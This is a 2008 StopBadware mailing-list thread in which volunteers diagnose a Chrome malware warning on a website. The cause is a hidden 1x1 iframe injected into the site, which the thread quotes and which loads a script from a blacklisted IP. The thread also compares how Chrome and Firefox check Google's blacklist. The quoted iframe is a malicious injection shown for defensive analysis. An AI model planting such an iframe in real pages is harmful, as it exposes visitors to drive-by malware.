Interesting thread! -A
-- Anirban Banerjee Co-Founder Jaalcheck.com PhD Candidate [EMAIL PROTECTED] Riverside On Tue, Oct 14, 2008 at 9:36 AM, Oliver Fisher <[EMAIL PROTECTED]>wrote: > > This one's a bit tricky, so bear with me... > > First, and most importantly, on line 310 of www . enniscroneonline . > com there's an iframe that you probably didn't add yourself. > > <iframe src="http://61 . 132 . 75 . 71 / iframe / wp-stats . php" > width=1 height=1 frameborder=0></iframe> > > That's an older wordpress attack that was popular 9 or 10 months ago. > You probably want to clean it up. The exploit is currently dormant, > but could come back at any time. > > Chrome uses Google's blacklist _on every request_, not just the top- > level page. So, when the iframe was loaded, Chrome made a request to > 61 . 132 . 75 . 71 which it found in the blacklist and so the warning > popped up (even though enniscroneonline isn't in the blacklist yet). > Firefox has a different behaviour and only checks the top-level page's > url against Google's blacklist, so there's not warning there. > > I'm not exactly sure what's up the the diagnostic page (0 instead of > 71), but I'm looking into it. > > Hope that helps, > O. > > On Oct 14, 12:01 pm, UseShots <[EMAIL PROTECTED]> wrote: > > Kent, > > > > I just wonder, how do you check this in Firefox? HTML source code or > > some plugin like noscrpt or firebug? > > Without checking the HTML code you could have missed this because > > that IP doesn't seem to respond right now and thus doesn't load > > anything to your browser. > > > > I also find the Safe Browsing diagnostics for IP addresses a bit > > confusing. When I'm trying to check 61.132 .75 .71 > http://www.google.com/safebrowsing/diagnostic?site=61.132.75.71 > > Google displays report for 61.132.75.0. > > Is it a report for the whole range of IPs from 61.132.75.0 to > > 61.132.75.255 ? Did they check all of them? > > > > Denishttp://UnmaskParasites.com > > > --~--~---------~--~----~------------~-------~--~----~ You received this message through the Google Groups "stopbadware" group. To post to this group, send email to [email protected] To unsubscribe from this group, send email to [EMAIL PROTECTED] For more options, visit this group at http://groups.google.com/group/stopbadware?hl=en -~----------~----~----~----~------~----~------~--~---
